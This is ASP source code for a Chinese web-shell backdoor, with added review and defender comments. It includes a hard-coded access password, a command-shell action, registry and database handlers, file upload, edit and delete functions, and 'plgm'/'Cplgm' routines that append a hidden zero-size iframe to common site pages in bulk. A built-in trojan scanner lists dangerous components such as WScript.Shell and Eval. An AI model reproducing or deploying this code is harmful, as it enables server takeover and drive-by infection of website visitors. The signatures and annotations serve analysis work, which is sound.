temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
' Substring checks: command-execution components referenced by ProgID or by CLSID.
' After the first hit for a file, temp becomes a "same as above" marker for the following rows.
If instr( filetxt, Lcase
("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase
("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
Report =
Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell 或者
clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font
color=red>危险组件,一般被ASP木马利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End if
If instr( filetxt, Lcase
("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase
("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
Report =
Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application 或者
clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font
color=red>危险组件,一般被ASP木马利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
' Regular-expression checks, case-insensitive: encoded script language, Eval, Execute,
' text-file open/create, SaveToFile and .Save.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).Encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\bEv"&"al\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()函数可以执行
任意ASP代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "[^.]\bExe"&"cute\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font
color=red>e"&"xecute()函数可以执行任意ASP代码
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.(Open|Create)TextFile\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>
使用了FSO的CreateTextFile|OpenTextFile读写文
件"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.SaveToFile\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>使用了Stream的
SaveToFile函数写文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.Save\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.Save</td><td>使用了XMLHTTP的Save函数
写文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
Set regEx = Nothing
' Follow <!--#include file="..."--> targets, resolved relative to this file's folder.
' Only targets whose extension fails CheckExt are scanned here.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
' Same for <!--#include virtual="..."-->, resolved against the site root.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Server.MapPath("\")
&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
' Server.Execute / Server.Transfer with a quoted literal target: follow the target file.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
If Not CheckExt(FSO1s.GetExtensionName(tFile))
Then
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
' Server.Execute / Server.Transfer whose argument is not a quoted literal cannot be followed;
' it is reported as a finding instead.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()[^""]\)"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font
color=red>不能跟踪检查Server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
Set Matches = Nothing
Set regEx = Nothing
' <script ... runat=server ...> tags: extract the src attribute value by hand and scan that file too.
Set XregEx = New RegExp
XregEx.IgnoreCase = True
XregEx.Global = True
XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
Set XMatches = XregEx.Execute(filetxt)
For Each Match in XMatches
tmpLake2 = Mid(Match.Value, 1, InStr
(Match.Value, ">"))
srcSeek = InStr(1, tmpLake2, "src", 1)
If srcSeek > 0 Then
srcSeek2 = instr(srcSeek, tmpLake2,
"=")
For i = 1 To 50
tmp = Mid(tmpLake2, srcSeek2 +
i, 1)
If tmp <> " " and tmp <> chr(9)
and tmp <> vbCrLf Then
Exit For
End If
Next
If tmp = """" Then
tmpName = Mid(tmpLake2,
srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 -
i - 1)
Else
If InStr(srcSeek2 + i + 1,
tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr
(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName =
tmpLake2
If InStr(tmpName, chr(9)) > 0
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
If InStr(tmpName, vbCrLf) > 0
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
If InStr(tmpName, ">") > 0 Then
tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
End If
Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")
&"\","",1,1,1))
SumFiles = SumFiles + 1
End If
Next
Set Matches = Nothing
Set regEx = Nothing
' CreateObject calls whose argument contains & or +, has no quote, or has nested parentheses
' are reported as using an obfuscated ("transformed") ProgID.
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
If Instr(Match.Value, "&") or Instr
(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr
(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
Report =
Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObjec
t函数使用了变形技术"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
' NOTE(review): leaving here skips the object cleanup at the end of the Sub.
exit sub
End If
Next
Set Matches = Nothing
Set regEx = Nothing
end if
set ofile = nothing
set FSO1s = nothing
End Sub
Function CheckExt(FileExt)
    ' True when DimFileExt is "*" or when the lower-cased FileExt equals one of the comma-separated
    ' entries of DimFileExt. Entries are compared as written: they are neither trimmed nor
    ' lower-cased. No value is assigned when nothing matches.
    Dim wanted
    wanted = LCase(FileExt)
    If DimFileExt = "*" Then
        CheckExt = True
    End If
    Ext = Split(DimFileExt, ",")
    i = 0
    Do While i <= UBound(Ext)
        If wanted = Ext(i) Then
            CheckExt = True
            Exit Function
        End If
        i = i + 1
    Loop
End Function
Function GetDateModify(filepath)
    ' Returns the DateLastModified value of the file at filepath, read through the FileSystemObject.
    Set F2SO = CreateObject("Scripting.FileSystemObject")
    Set f = F2SO.GetFile(filepath)
    s = f.DateLastModified
    GetDateModify = s
    Set F2SO = Nothing
    Set f = Nothing
End Function
Function GetDateCreate(filepath)
    ' Returns the DateCreated value of the file at filepath, read through the FileSystemObject.
    Set F3SO = CreateObject("Scripting.FileSystemObject")
    Set f = F3SO.GetFile(filepath)
    s = f.DateCreated
    GetDateCreate = s
    Set F3SO = Nothing
    Set f = Nothing
End Function
Function tURLEncode(Str)
    ' Percent-encodes only "%", "#" and "&" ("%" first, so the later escapes are not re-encoded).
    ' Every other character passes through unchanged, so the result is not a full URL or HTML encoding.
    Dim pair
    temp = Str
    For Each pair In Array(Array("%", "%25"), Array("#", "%23"), Array("&", "%26"))
        temp = Replace(temp, pair(0), pair(1))
    Next
    tURLEncode = temp
End Function
Sub ShowAllFile2(Path)
    ' Recursively walks Path for the file-search mode: every file whose extension passes CheckExt
    ' is handed to IsFind, then each subfolder is visited. SumFiles and SumFolders count progress.
    Set F4SO = CreateObject("Scripting.FileSystemObject")
    If F4SO.FolderExists(Path) Then
        Set f = F4SO.GetFolder(Path)
        Set fc2 = f.files
        For Each myfile In fc2
            If CheckExt(F4SO.GetExtensionName(Path & "\" & myfile.name)) Then
                IsFind Path & "\" & myfile.name
                SumFiles = SumFiles + 1
            End If
        Next
        Set fc = f.SubFolders
        For Each f1 In fc
            Call ShowAllFile2(Path & "\" & f1.name)
            SumFolders = SumFolders + 1
        Next
        Set F4SO = Nothing
    End If
End Sub
Sub IsFind(thePath)
' Decides whether thePath matches the search form. Its last-modified date must equal one of the
' ";"-separated Search_Date values (or Search_Date is ALL) and, when Search_Content is given,
' the lower-cased file text must contain it. A match appends a row to Report and increments Sun.
' NOTE(review): the action links below are built from FilePath, which is not a parameter of this
' Sub; confirm what that name holds at this point.
' NOTE(review): in the content-match branch the row is appended to Report twice.
theDate = GetDateModify(thePath)
on error resume next
' Keep only the date part (text before the first space) for comparison with the form values.
theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
if err then exit Sub
xDate = Split(request.Form("Search_Date"),";")
If request.Form("Search_Date") = "ALL" Then ALLTime = True
For i = 0 To Ubound(xDate)
If theTmp = xDate(i) or ALLTime = True Then
If request("Search_Content") <> "" Then
Set FSO2s = CreateObject
("Scripting.FileSystemObject")
set ofile = FSO2s.OpenTextFile(thePath,
1, false, -2)
filetxt = Lcase(ofile.readall())
If Instr( filetxt, LCase(request.Form
("Search_Content"))) > 0 Then
temp = "<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a>"
temp=temp&" → <a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
Report = Report&"<tr><td
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Report =
Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
ofile.close()
Set ofile = Nothing
Set FSO2s = Nothing
Else
' No content filter: a date match alone is reported.
temp = "<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
Report = Report&"<tr><td
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
End If
Next
End Sub
Case "plgm"
' "plgm" action: appends a caller-supplied snippet to web files under a chosen folder.
' fd is the folder (defaults to the site root) and code is the snippet; when code is empty a
' zero-size iframe pointing at 127.0.0.1 is used as the default text.
' Defender note: the snippet is appended to otherwise legitimate pages, so when this script is
' found on a server, compare deployed files with a known-good copy and review modification times.
Server.ScriptTimeout=1000000
Response.Buffer=False
RRS ("<b>当前网站绝对路径:")&Server.MapPath("/")&("</b>")
ASP_SELF=Request.ServerVariables("PATH_INFO")
s=Request("fd")
if s="" then s=Server.MapPath("/")
ex=Request("ex")
pth=Request("pth")
newcnt=Request("newcnt")
addcode = Request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0
height=0></iframe>"
' ex/pth select a single-file show or save handler; neither handler is visible in this part of the listing.
If ex<>"" AND pth<>"" Then
select Case ex
Case "edit"
CALL file_show(pth)
Case "save"
CALL file_save(pth)
End select
Else
RRS("<form method=""POST""> ")
RRS("<table width=560 border=""0"" style=""font-size:12px;"">")
RRS("<tr>")
RRS("<td width=""102"">要挂马文件夹的绝对路径:</td>")
RRS("<td width=""359""><input type=""text"" name=""fd"" value="""&s&"""
size=60></td>")
RRS("<td width=""69""> </td>")
RRS("</tr><tr><td>要挂马的代码:</td>")
RRS("<td><textarea name=""code"" cols=58
rows=""3"">"&addcode&"</textarea></td>")
RRS("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
RRS("</tr></table></form> ")
End If
Function IsPattern(patt,str)
    ' Returns True when the regular expression patt matches anywhere in str, ignoring case;
    ' otherwise False.
    Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Pattern = patt
    retVal = regEx.Test(str)
    Set regEx = Nothing
    IsPattern = (retVal = True)
End Function
' Runs on form submit: folder and snippet must both be non-empty, and the folder must contain a
' character other than a/b followed by ":" and a slash (a drive-letter path) before the walk starts.
if request.form("submit")<>"" then
If s="" or addcode="" Then
RRS "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then sch s
End If
end if
Sub sch(s)
' Walks folder s: hands every file path to step_all, then recurses into each subfolder.
' Errors are suppressed for the whole walk.
' NOTE(review): the mixed-case spelling of the next statement is behaviour-neutral in VBScript;
' content signatures for scripts like this one should match keywords case-insensitively.
oN eRrOr rEsUmE nExT
Set fs=Server.createObject("Scripting.FileSystemObject")
Set fd=fs.GetFolder(s)
Set fi=fd.Files
Set sf=fd.SubFolders
For Each f in fi
rtn=f.path
step_all rtn
Next
If sf.Count<>0 Then
For Each l In sf
sch l
Next
End If
End Sub
Sub step_all(agr)
' Filters a file path: only files whose base name is one of the listed common page names
' (default, index, conn, admin, login, ...) with extension htm/html/asp/php/jsp/aspx/cgi/js
' are passed on to step1 and step2; every other path is ignored.
retVal=IsPattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|QQ|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr)
If retVal Then
step1 agr
step2 agr
Else
Exit Sub
End If
End Sub
Sub step1(str1)
' Prints the matched path followed by download/edit/delete/copy/move links; each link calls the
' page's FullForm() JavaScript helper with the path (backslashes doubled) and an action name.
RRS "<div style='line-height:20px'>√ "&str1&" _"
RRs "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DownFile"")' class='am' title='下载'>下载</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a></div>"
End Sub
Sub step2(str2)
' If the file exists, opens it as a text stream in mode 8 (append) and writes the text held in
' addcode, which is a script-level variable rather than a parameter of this Sub.
' Paths whose last eight characters start with "conn" (for example conn.asp) take the other branch.
Set fs=Server.createObject("Scripting.FileSystemObject")
isExist=fs.FileExists(str2)
If isExist Then
Set f=fs.GetFile(str2)
Set f_addcode=f.OpenAsTextStream(8,-2)
if left(right(str2,8),4)="conn" then
f_addcode.Write
else
f_addcode.Write addcode
f_addcode.Close
Set f=Nothing
End If
end if
Set fs=Nothing
End Sub
Err.Clear
Case "Cplgm"
' "Cplgm" action: one form, three modes selected by M. Mode 1 appends a snippet to files, mode 2
' removes a given string from files, mode 3 replaces one string with another.
' fd is the start folder, pcfile lists file names to leave untouched (defaults to this script's
' own file name), FType lists the extensions to touch.
' Defender note: every mode rewrites site content in bulk; when this script is found on a server,
' compare deployed files with a known-good copy rather than relying on spot checks.
Fpath=Request("fd")
addcode = Request("code")
addcode2 = Request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
ShowMsg=request("ShowMsg")
FType=request("FType")
M=request("M")
if Ftype="" then
Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if Fpath="\" then Fpath=Server.MapPath("\")
if Fpath="." or Fpath="" then Fpath=Server.MapPath("/")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm
width=0 height=0></iframe>"
if checkbox="" then checkbox=request("checkbox")
' Default exclusion: the last path segment of SCRIPT_NAME, i.e. this script's own file name.
if pcfile="" then
pcfileName=Request.ServerVariables("SCRIPT_NAME")
pcfilek=split(pcfileName,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
RRS ("<b>网站根目录</b>- "&Server.MapPath("/")&"<br>")
RRS ("<b>本程序目录</b>- "&Server.MapPath("."))
RRS "<form method=POST><div style='color:#3399ff'><b>["
if M="1" then RRS"批量挂马器-批量挂马"
if M="2" then RRS"批量清马器-清除别人的网马"
if M="3" then RRS"批量替换器-文件替换修改工具"
if M="" then response.end
RRS "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
RRS "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
if M="1" then RRS "<tr><td>过滤重复:</td><td><input class=c
name='checkbox' checked='checked' type=checkbox value=""checked""
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"
RRS "<tr><td>排除文件:</td>"
RRS "<td><input name='pcfile' type=text id='pcfile'
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
RRS "<tr><td>文件类型:</td>"
RRS "<td><input name='FType' type=text id='FType'
value='"&Ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
if M="1" then RRS"要挂的马:"
if M="2" then RRS"要清的马:"
if M="3" then RRS"查找内容:"
RRS"</font></td><td><textarea name=code cols=66
rows=3>"&addcode&"</textarea></td></tr>"
if M="3" then RRS "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66
rows=3>"&addcode&"</textarea></td></tr>"
RRS "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
RRS "</table></form>"
' The walk itself only starts when the form's submit button value is posted back.
if request("submit")="开始执行" then
RRS"<div style='line-height:25px'><b>执行记录:</b><br>"
call InsertAllFiles(Fpath,addcode,pcfile)
RRS"</div>"
end if
Sub InsertAllFiles(Wpath,Wcode,pc)
' Recursive worker for the Cplgm form. For each file in Wpath whose name does not occur in pc and
' whose extension occurs in FType, it applies mode M (1 append Wcode, 2 delete Wcode, 3 replace
' Wcode with addCode2), prints a status mark and file-manager links, then descends into subfolders.
' M, FType, checkbox and addCode2 are read from script-level variables, not from parameters.
' With checkbox="checked", mode 1 first reads the file and skips it when Wcode is already present.
' Errors are suppressed from the folder lookup onwards.
Server.ScriptTimeout=999999999
if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
Set WFSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = WFSO.GetFolder(Wpath)
Set fc2 = f.files
For Each myfile in fc2
Set FS1 = CreateObject("Scripting.FileSystemObject")
' FType3 = lower-cased text after the last dot of the file name, or a placeholder when there is no dot.
FType1=split(myfile.name,".")
FType2=ubound(FType1)
if Ftype2>0 then
FType3=LCase(FType1(FType2))
else
FType3="无"
end if
if Instr(LCase(pc),LCase(myfile.name))=0 and Instr
(LCase(FType),FType3)<>0 then
select case M
case "1"
if checkbox<>"checked" then
Set
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
if left(myfile.name,4)="conn"
then
tfile.Write
RRS"√
"&Wpath&myfile.name
else
tfile.writeline Wcode
RRS"√
"&Wpath&myfile.name
tfile.close
end if
end if
if checkbox="checked" then
Set
tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
if Instr
(tfile1.readall,Wcode)=0 then
Set
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
if left(myfile.name,4)
="conn" then
tfile.Write
RRS"×
"&Wpath&myfile.name
else
tfile.writeline Wcode
RRS"√
"&Wpath&myfile.name
tfile1.close
end if
else
RRS"<font
color=red>×</font> "&Wpath&myfile.name
tfile1.close
end if
Set tfile1=Nothing
end if
case "2"
Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
NewCode=Replace
(tfile1.readall,Wcode,"")
Set
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
RRS"√ "&Wpath&myfile.name
Set objCountFile=Nothing
case "3"
Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
NewCode=Replace
(tfile1.readall,Wcode,addCode2)
Set
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
RRS"√ "&Wpath&myfile.name
Set objCountFile=Nothing
case else
RRS"大哥,别乱来.":response.end
end select
else
RRS"× "&Wpath&myfile.name
end if
RRS " → <a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='下
载'>下载</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='编
辑'>编辑</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")' onclick='return yesok()' class='am' title='删除'>删
除</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='复
制'>复制</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='移
动'>移动</a><br>"
Next
Set fsubfolers = f.SubFolders
For Each f1 in fsubfolers
NewPath=Wpath&""&f1.name
InsertAllFiles NewPath,Wcode,pc
Next
set tfile=nothing
Set FSO = Nothing
set tfile=nothing
set tfile2=nothing
Set WFSO = Nothing
End Sub
' Remaining Action values: file-manager operations on FName (taken from the request), upload,
' command, database, registry and server-information handlers defined elsewhere in the script.
' "Logout" removes the session key web2a2dmin and redirects to the script URL.
' Any Action not listed falls through to MainForm().
Case "ReadREG":call ReadREG()
Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session
("FolderPath")):Set ABC=Nothing
Case "DownFile":DownFile FName:ShowErr()
Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set
ABC=Nothing
Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set
ABC=Nothing
Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
Case "UpFile":UpFile()
Case "Cmd1Shell":Cmd1Shell()
Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect
URL
Case "DbManager":DbManager()
Case "Course":Course()
Case "ServerInfo":ServerInfo()
Case Else MainForm()
End Select
if Action<>"Servu" then ShowErr()
RRS"</body></html>"
%>
' Script-wide settings. The access password is hard-coded in clear text below.
' The script timeout is raised to a very large value and run-time errors are suppressed page-wide.
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass="643617" 'password
mName="BY:.尐飛" 'backdoor name
Copyright="注:请勿用于非法用途,否则后果作者概不负责" 'copyright notice
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
Sub ShowErr()
    ' When an error is pending, writes its description as a "go back" link, then clears the error
    ' and flushes the response. The description is written into the page without HTML encoding.
    If Err.Number <> 0 Then
        RRS "<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
        Err.Clear
        Response.Flush
    End If
End Sub
Sub RRS(str)
    ' Shorthand used throughout the script: writes str to the HTTP response as-is.
    Response.Write str
End Sub
Function RePath(S)
    ' Doubles every backslash in S; the script uses the result inside JavaScript string literals.
    Dim parts
    parts = Split(S, "\")
    RePath = Join(parts, "\\")
End Function
Function RRePath(S)
    ' Inverse of RePath: collapses each doubled backslash in S back to a single one.
    RRePath = Replace(S, "\\", "\", 1, -1, vbBinaryCompare)
End Function
' Request-derived state. Action, FolderPath and FName are read from Request with no check here
' and drive the dispatcher and the file operations.
' NOTE(review): serveru/serverp pair this script's own URL with its password. Their use is not
' visible in this part of the listing; when analysing a sample, trace where they are sent or stored.
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
